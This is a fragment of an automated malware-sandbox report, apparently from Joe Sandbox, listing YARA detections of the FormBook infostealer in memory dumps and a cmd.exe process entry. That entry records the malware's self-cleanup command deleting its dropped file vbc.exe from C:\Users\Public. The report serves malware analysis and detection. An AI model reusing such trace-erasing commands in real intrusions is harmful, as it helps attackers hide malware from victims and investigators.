                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Start time:14:45:48
                                                                                                                                                                      Start date:12/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                      Imagebase:0x4a440000
                                                                                                                                                                      File size:302592 bytes
                                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                      Reset < >